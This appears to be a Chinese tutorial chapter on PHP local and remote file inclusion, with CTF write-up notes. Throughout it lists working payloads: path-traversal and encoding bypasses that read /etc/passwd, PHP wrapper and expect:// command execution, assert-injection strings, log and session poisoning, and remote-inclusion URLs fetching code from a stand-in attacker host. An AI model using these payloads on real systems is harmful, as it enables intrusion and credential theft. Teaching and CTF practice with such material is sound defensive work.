4.6 File Inclusion
简介
是什么
文件包含,一个简单的例子,和 c 语言 include 一样,将一个文件包含到另一个文件。通常出现在多文件开发,模块化开发的场景下。
文件包含,就是代码中通过某种方法包含了其它文件,可以将另一个文件的内容引入到当前文件。从而可以执行代码。
最终的危害就是包含由我们可以控制的内容文件,从而执行代码。
# 本地文件包含
http://example.com/index.php?page=/etc/passwd
# 远程文件包含
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
根据包含文件的位置,文件包含分为 LFI / RFI 本地文件包含/远程文件包含。
实际中的限制
虽然能包含文件,通常只能包含某个固定范围的文件。
即使能随便包含,通常也找不到存在恶意代码的文件。
远程包含一般是默认禁用,或者代码不支持。
攻击
-
探测参数入口点。一般而言,参数名、值都比较明显,page= 或 file= 等等。这块可以根据经验进行判断。
-
绕过代码过滤。常见的绕过方式,见下文。
-
利用。最终执行代码。
代码防御绕过
绕过原理
某些是利用系统、编程语言、中间件的特性。例如在某些场景下:
/etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.
常见的绕过方式分为以下几种:
-
代码过滤不严谨:
# 非递归过滤 http://example.com/index.php?page=....//....//....//etc/passwd http://example.com/index.php?page=....\/....\/....\/etc/passwd http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd # 若代码是检测前缀 http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd # 若是黑名单过滤后缀 shellcode.php/. passwd/ # 后缀白名单,利用截断 http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././. # 路径长度截断 http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
-
编码、特殊字符:
# 若代码在尾部添加文件后缀,可以尝试 00 截断 http://example.com/index.php?page=../../../etc/passwd%00 # 或许可以尝试二次 url 编码 http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
-
若是远程包含,并且代码中固定了文件后缀,此时可以尝试将其化为 url 参数。
include($_GET['file'].'.png'); # 那么可以这样传参 ?file=shell.php?x=1 ?file=shell.php#x=1
利用
php url-wrappers
php 提供的协议封装流,可以将很多东西视为文件。可以扩大文件包含的利用面。关于 php 支持的 wapper 详情见 官方手册。
php 中包含函数 require, require_once, include, include_once
php 中与之相关的参数有 allow_url_fopen allow_url_include
分别决定能否使用协议封装流,能否在包含函数处使用。
phpinfo 中的信息
# 用于读取敏感文件
# 可以以编码的形式读取文件,防止乱码,或读取二进制文件
php://filter/read=string.rot13/resource=index.php
php://filter/convert.base64-encode/resource=index.php
# 读取并使用zlib 压缩
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
# 解码 readfile('php://filter/zlib.inflate/resource=test.deflated');
# 用于提供 php 恶意代码,结合文件包含 getshell
# data 协议直接包含 php 代码
data://text/plain,<?php phpinfo(); ?>
# 和data协议类似
http://example.com/index.php?page=php://input
post 提交数据 <?php phpinfo(); ?>
# except 协议直接执行系统命令
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
# phar 可以包含php 代码,或在反序列化处使用。
assert
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
' and die(show_source('/etc/passwd')) or '
' and die(system("whoami")) or '
assert("strpos('' and die(system("whoami")) or '', '..') === false") or die("Detected hacking attempt!");
apache 、ssh log
触发log,然后包含。不一定能有权限访问日志
# apache /var/log/apache2/access.log
通过请求 url 中携带 php 代码触发
# ssh /var/log/auth.log
通过请求触发 ssh -l "<?php phpinfo(); ?>" ip
/proc/self/*
-
/proc/self/environ
包含一些运行时的环境变量,例如
REMOTE_PORT
、HTTP_USER_AGENT
等等。可以尝试在修改数据包中 user-agent 等信息,添加恶意代码,然后包含这个文件。
在某些高系统版本中,该文件不能被非 root 用户访问
-
/proc/self/fd/*
包含该进程打开的文件描述符。当有上传文件、或者将session 保存到文件中,就可以用到这个。
phpsession
phpsession 通常存放在文件中。
# 通常存放位置
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
当看到响应包中有Set-Cookie 设置 PHPSESSID,则可以尝试。
结合文件上传
上传 zip,phar ,包含php 代码的图片、文本文件等等,可以与文件包含联合起来。
ctf 中
-
ciscn_2021 middle_source
页面包含一个文件包含漏洞,并且成功包含 phpinfo 文件。allow_url_include 开关关闭,无效远程包含。
尝试包含 log、 proc 目录下文件、session 都失效了。仔细看 phpinfo ,发现 session.upload_progress.enabled 开关是开启的。并且 session 保存路径是可访问到的。
则构造出 session.upload_progress.enabled 产生场景,并包含 session 文件。
由于这个 session 是在上传时记录上传过程,那就构造上传请求,并添加这个 session 。并且这个 session 存活时间较短,所以也需要条件竞争。
详见 https://blog.csdn.net/m0_51078229/article/details/114440061。
-
[HCTF 2018]WarmUp
题目要求必须以特定文件开头,故 exp 为
/source.php?file=source.php?/../../../../ffffllllaaaagggg
其原理是将
source.php?
视为一个文件,从而目录穿越。虽然这个目录是不存在的,但依然可以。在 linux
PHP 7.4.15
下,这样是可以,但在 windowsphp 5.4.45 / 7.2.1
版本下都失败了# aaa <?php phpinfo(); ?> # zzz.php <?php set_include_path("C:/Users/EA/Documents/phpStudy/PHPTutorial/php/php-5.4.45");include "asd?/../aaa"; ?> Warning: include(): Failed opening 'asd?/../aaa' for inclusion